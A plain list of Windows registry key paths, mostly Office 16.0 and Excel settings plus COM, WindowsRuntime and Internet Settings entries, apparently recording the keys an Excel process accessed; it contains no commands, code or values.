HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\deacd2e8\-239451978\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\deacd2e8\-239451978\LastModified
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\GipActivityBypass
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{E1CDD77A-65D3-4DB0-B339-21F6A48CC2FF}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountInternal\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountInternal\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountInternal\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountInternal\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountInternal\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountInternal\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountInternal\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountInternal\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountInternal\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountInternal\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountInternal\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\XAML\OneCoreTransformsEnabledByDefault
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{2DBDBA9D-20DA-519D-9078-09F835BC5BC7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\AppID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\ValidationSinkHandlerName
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\PrivacyDialogsDisabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\ConvertDocument
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\AttemptDisabledActionMessage
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\BuildLabEx
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\BuildLabEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\EXCEL.EXE
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\System\Setup\SystemSetupInProgress
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\EXCEL.EXE
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{B5A6F1BC-1641-5F4C-B946-79084E41EE35}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{9E8E4BD8-BFC5-4785-94C2-B210DB698776}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ADUserName
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\SignedOutADUser
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ConnectedAccountCID
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\SignedOutMSAUser
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\Default UI Theme
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Default UI Theme
HKEY_USERS\.default\Software\Microsoft\IdentityCRL\AppData\appid=d3590ed6-52b3-4102-aeff-aad2292ab01c&clientid=d3590ed6-52b3-4102-aeff-aad2292ab01c\FirstParty
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\RoamingLastWriteTimeExcel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\ViewerMode
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\SubscriptionCustomerLicenseInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\PerpetualLicenseInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableRobustifiedUNC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Defender\Features\SenseDlpEnabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Security\NoPromptForRC4Encryption
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Font
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Category
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Name
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\ParentFolder
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\DeferPrecreateAndRedirect
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\RelativePath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\ParsingName_36354489
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\ParsingName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\InfoTip
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\LocalizedName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Icon
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Security
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\StreamResource
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\StreamResourceType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Roamable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\PreCreate
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Stream
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\PublishExpandedPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\DefinitionFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\DPLProtectionLevel
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Attributes
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\FolderTypeID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\InitFolderHandler
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Cache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Cache
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{A168AADC-1674-49DA-AD4F-4F27DF8760D0}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\AppID
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Hostname
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Domain
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LocalService
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ServiceParameters
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\RunAs
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ActivateAtStorage
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\AppIDFlags
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ROTFlags
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\MGOTFlags
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ProcessMitigationPolicy
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LaunchPermission
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\LegacyAuthenticationLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\LegacyImpersonationLevel
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\AuthenticationLevel
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\RemoteServerName
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\SRPTrustLevel
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\PreferredServerBitness
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LoadUserSettings
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ProtectionLevel
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\DllSurrogate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\UndoHistory
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DontSupportUndoForLargePivotTables
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\PivotTableUndoRowThousandCount
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DontSupportUndoForLargeDataModels
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\PivotTableUndoDataModelSize
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\PreferExcelDataModel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DontSuggestCompatFmlaVariation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\DisableIdleMemoryFlush
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\DisableEDPIsIdentityManagedGate
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\PrintInProtectedView
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING\EXCEL.EXE
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\EXCEL.EXE
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FromCacheTimeout
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\ActivateOnHostFlags
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableKeepAlive
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IdnEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreConnectLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreResolveLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CacheMode
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBasicOverClearChannel
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableAutoProxyResultCache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisplayScriptDownloadFailureUI
